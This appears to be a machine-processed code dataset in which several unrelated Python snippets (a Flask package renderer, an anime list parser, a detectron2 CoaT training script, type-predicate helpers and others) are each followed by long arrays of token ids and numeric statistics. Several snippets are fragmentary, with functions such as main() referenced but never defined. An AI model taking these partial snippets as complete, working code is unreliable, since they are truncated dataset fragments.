except DistributionNotFound:
return 'version not found'
if __name__ == "__main__":
main()
| [
11748,
1822,
29572,
198,
11748,
20966,
21975,
198,
6738,
25064,
1330,
336,
1082,
81,
198,
198,
11748,
275,
2069,
18,
198,
6738,
279,
10025,
62,
37540,
1330,
651,
62,
17080,
3890,
11,
27484,
3673,
21077,
198,
198,
28311,
25,
198,
220,
... | 2.03496 | 9,611 |
valores = []
c = 1
continuar = 'S'
while continuar != 'N':
valor = int(input(f'{c} Número: '))
if valor not in valores:
valores.append(valor)
print('Valor adicionado com sucesso!')
c += 1
print(' ')
else:
print('Erro! Valor duplicado.')
print('')
continuar = input('Deseja continuar? [S/N] ').upper()
print('')
valores.sort()
print('-' * 30)
print(f'Os valores digitados foi: {valores}')
| [
2100,
2850,
796,
17635,
201,
198,
66,
796,
352,
201,
198,
18487,
84,
283,
796,
705,
50,
6,
201,
198,
4514,
11143,
283,
14512,
705,
45,
10354,
201,
198,
220,
220,
220,
1188,
273,
796,
493,
7,
15414,
7,
69,
6,
90,
66,
92,
399,
2... | 1.983264 | 239 |
#!/usr/bin/python
class Car(object):
"""docstring for Car"""
class Truck(Car):
"""docstring for Truck"""
# This is the standard boilerplate that calls the main() function.
if __name__ == '__main__':
main() | [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
4871,
1879,
7,
15252,
2599,
198,
197,
37811,
15390,
8841,
329,
1879,
37811,
198,
198,
4871,
24892,
7,
9914,
2599,
198,
197,
37811,
15390,
8841,
329,
24892,
37811,
198,
198,
2,
770,
318,
... | 3.117647 | 68 |
from functools import partial
from typing import (Any,
Tuple)
from .hints import Predicate
def instance_of(*types: type) -> Predicate:
"""
Creates predicate that checks if object is instance of given types.
>>> is_any_string = instance_of(str, bytes, bytearray)
>>> is_any_string(b'')
True
>>> is_any_string('')
True
>>> is_any_string(1)
False
"""
result = partial(is_instance_of,
types=types)
result.__name__ = result.__qualname__ = (
'is_instance_of_' + '_or_'.join(type_.__name__ for type_ in types))
result.__doc__ = ('Checks if given object is instance '
'of one of types: "{types}".'
.format(types='", "'.join(type_.__qualname__
for type_ in types)))
return result
def subclass_of(*types: type) -> Predicate:
"""
Creates predicate that checks if type is subclass of given types.
>>> is_metaclass = subclass_of(type)
>>> is_metaclass(type)
True
>>> is_metaclass(object)
False
"""
result = partial(is_subclass_of,
types=types)
result.__name__ = result.__qualname__ = (
'is_subclass_of_' + '_or_'.join(type_.__name__ for type_ in types))
result.__doc__ = ('Checks if given type is subclass '
'of one of types: "{types}".'
.format(types='", "'.join(type_.__qualname__
for type_ in types)))
return result
| [
6738,
1257,
310,
10141,
1330,
13027,
198,
6738,
19720,
1330,
357,
7149,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
309,
29291,
8,
198,
198,
6738,
764,
71,
29503,
1330,
1... | 2.099075 | 757 |
"""
1.
This stores many different modification display methods, and all the modification will be got from here.
Shorthand:
Spectronaut -> SN
"""
class ModType(BasicModInfo):
"""
Spectronaut version 12 has get_one_prefix_result different modification display type.
The default version is set to 12, which uses the new modification display method.
The version should be set in each main functions but not the functions that are used frequently.
"""
@staticmethod
| [
37811,
198,
16,
13,
198,
1212,
7000,
867,
1180,
17613,
3359,
5050,
11,
290,
477,
262,
17613,
481,
307,
1392,
422,
994,
13,
198,
198,
2484,
1506,
392,
25,
198,
49738,
1313,
2306,
4613,
11346,
198,
198,
37811,
628,
198,
198,
4871,
340... | 3.755725 | 131 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
from anime import Anime
class AnimeList():
"""Holds info about a user's anime list
"""
def get_anime_data(self, include_ptw, exclude_animes_from_file,
excluded_animes):
"""Get basic data concerning the animes in the animelist
Returns a dict containing anime_title, anime_id,
anime_url, anime_status
"""
self.parser.feed(self.content)
if not include_ptw:
self.exclude_animes_by_status(MalStatusNamespace.ptw)
if excluded_animes:
self.exclude_animes_by_titles(excluded_animes)
if exclude_animes_from_file:
animes_to_exclude = set()
with open(exclude_animes_from_file, 'r',
encoding='utf-8') as f:
for line in f:
animes_to_exclude.add(line.split('\t')[1])
self.exclude_animes_by_titles(animes_to_exclude)
return self.parser.anime_data
def get_list_of_animes(self):
"""Returns a list of Anime
extracted from the content of the animelist"""
animes = list()
for data in self.anime_data:
print(data['anime_title'].encode('utf-8'))
animes.append(Anime.from_dict(data))
return animes
def exclude_animes_by_status(self, excluded_status):
"""Exclude animes from self.parser.anime_data that have the
status excluded_status
"""
self.parser.anime_data = list(
filter(lambda x: x['anime_status'] != excluded_status,
self.parser.anime_data))
def exclude_animes_by_titles(self, animes_title_to_exclude):
"""Exclude animes from self.parser.anime_data that are in
animes_title_to_exclude
"""
self.parser.anime_data = list(
filter(lambda x: x['anime_title'] not in animes_title_to_exclude,
self.parser.anime_data))
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
201,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
201,
198,
201,
198,
6738,
275,
82,
19,
1330,
23762,
50,
10486,
201,
198,
201,
198,
6738,
11984,
1330,
27812... | 2.025415 | 1,023 |
#!/usr/bin/env python
"""
Detection Training Script for CoaT.
This script is a modified version of the training script in detectron2/projects/TridentNet
"""
import os
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.config import get_cfg
from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch
from detectron2.evaluation import COCOEvaluator
from coat import add_coat_config
def setup(args):
"""
Create configs and perform basic setups.
"""
cfg = get_cfg()
add_coat_config(cfg)
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
default_setup(cfg, args)
return cfg
if __name__ == "__main__":
parser = default_argument_parser()
parser.add_argument("--debug", action="store_true", help="enable debug mode")
args = parser.parse_args()
print("Command Line Args:", args)
if args.debug:
import debugpy
print("Enabling attach starts.")
debugpy.listen(address=('0.0.0.0', 9310))
debugpy.wait_for_client()
print("Enabling attach ends.")
launch(
main,
args.num_gpus,
num_machines=args.num_machines,
machine_rank=args.machine_rank,
dist_url=args.dist_url,
args=(args,),
) | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
37811,
198,
11242,
3213,
13614,
12327,
329,
1766,
64,
51,
13,
198,
198,
1212,
4226,
318,
257,
9518,
2196,
286,
262,
3047,
4226,
287,
4886,
1313,
17,
14,
42068,
14,
2898,
738,
79... | 2.524809 | 524 |
import os
import pprint
import sys
import hydra
import pandas as pd
from hydra.utils import instantiate
from omegaconf import DictConfig, OmegaConf
sys.path.append("src/")
@hydra.main(config_path="../../config", config_name="default")
if __name__ == "__main__":
main()
| [
11748,
28686,
198,
11748,
279,
4798,
198,
11748,
25064,
198,
198,
11748,
25039,
198,
11748,
19798,
292,
355,
279,
67,
198,
6738,
25039,
13,
26791,
1330,
9113,
9386,
198,
6738,
267,
28917,
7807,
69,
1330,
360,
713,
16934,
11,
19839,
1854... | 3 | 93 |
'''
Created on Mar 13, 2020
@author: ballance
'''
from ucis.cover_type import CoverType
| [
7061,
6,
198,
41972,
319,
1526,
1511,
11,
12131,
198,
198,
31,
9800,
25,
2613,
590,
198,
7061,
6,
198,
6738,
334,
66,
271,
13,
9631,
62,
4906,
1330,
17546,
6030,
198,
220,
220,
220,
220
] | 2.583333 | 36 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from flask import render_template
__author__ = 'Ondřej Lanč'
class Renderer(object):
"""class for render package elements
"""
def entry_render(self, entry):
"""base render method render all type of entries
:param entry: entry for rendering
:return: rendered entry
"""
try:
return self.render[type(entry).__name__](entry)
except KeyError:
return None
def render_container(self, container):
"""render container
:param container: container for render
:return: renderer container
"""
entries = []
for entry in container.entries.values():
entries.append(self.entry_render(entry))
return render_template('package/entries/container.html',
name=container.name,
full_name=container.full_name,
label=container.label,
help=container.help,
inconsistent=container.inconsistent,
entries=entries)
@staticmethod
def render_bool(entry):
"""render entry
:param entry: bool keyword
:return: renderer entry
"""
return render_template('package/entries/bool.html',
name=entry.name,
full_name=entry.full_name,
label=entry.label,
help=entry.help,
inconsistent=entry.inconsistent,
value=entry.value,
)
@staticmethod
def render_number(entry):
"""render entry
:param entry: number keyword
:return: renderer entry
"""
return render_template('package/entries/number.html',
name=entry.name,
full_name=entry.full_name,
label=entry.label,
help=entry.help,
inconsistent=entry.inconsistent,
value=entry.value,
step=entry.step,
min=entry.min,
max=entry.max,
)
@staticmethod
def render_string(entry):
"""render entry
:param entry: string keyword
:return: renderer entry
"""
if entry.list and not entry.user_values:
return render_template('package/entries/select.html',
name=entry.name,
full_name=entry.full_name,
label=entry.label,
help=entry.help,
inconsistent=entry.inconsistent,
value=entry.value,
list=entry.list,
)
return render_template('package/entries/string.html',
name=entry.name,
full_name=entry.full_name,
label=entry.label,
help=entry.help,
inconsistent=entry.inconsistent,
value=entry.value,
list=entry.list,
regexp=entry.reg_exp,
)
@staticmethod
def render_multiple_container(container):
"""render entry
:param container: container entry
:return: renderer container
"""
entries = [(i, container.primary_value(i), entry.full_name,
entry.inconsistent)
for i, entry in enumerate(container.entries)]
return render_template('package/entries/multiple_cont.html',
name=container.name,
full_name=container.full_name,
inconsistent=container.inconsistent,
label=container.label,
help=container.help,
entries=entries,
max=container.multiple_max,
min=container.multiple_min,
)
def render_multiple_key_word(self, mult_entry):
"""render entry
:param mult_entry: Multiple keyword
:return: renderer entry
"""
entries = [
(i, entry.name, self.entry_render(entry), entry.inconsistent)
for i, entry in enumerate(mult_entry.entries)]
return render_template('package/entries/multiple_key.html',
name=mult_entry.name,
full_name=mult_entry.full_name,
inconsistent=mult_entry.inconsistent,
label=mult_entry.label,
help=mult_entry.help,
entries=entries,
max=mult_entry.multiple_max,
min=mult_entry.multiple_min,
)
def render_section(self, section):
"""render section
:param section: Section entry
:return: renderer section
"""
entries = []
for entry in section.entries:
entries.append(self.entry_render(entry))
return render_template('package/entries/section.html',
full_name=section.full_name,
label=section.label,
description=section.description,
inconsistent=section.inconsistent,
entries=entries,
)
def render_modal(self, entry):
"""render section
:param entry: container entry for modal
:return: renderer entry
"""
content = self.entry_render(entry)
return render_template('elements/modal.html',
name=entry.name,
full_name=entry.full_name,
inconsistent=entry.inconsistent,
content=content,
index=entry.index,
)
def render_collapse(self, entry):
"""render section
:param entry: container entry for collapse
:return: renderer entry
"""
content = self.entry_render(entry)
return render_template('elements/collapse.html',
name=entry.name,
full_name=entry.full_name,
inconsistent=entry.inconsistent,
content=content,
index=entry.index,
)
def reload_element(self, entry):
"""render entry
:param entry: entry for rerendering
:return: renderer entry
"""
content = self.entry_render(entry)
return content
| [
2,
48443,
14629,
14,
8800,
14,
29412,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
6738,
42903,
1330,
8543,
62,
28243,
198,
198,
834,
9800,
834,
796,
705,
46,
358,
129,
247,
68,
73,
14730,
46195,
... | 1.729176 | 4,298 |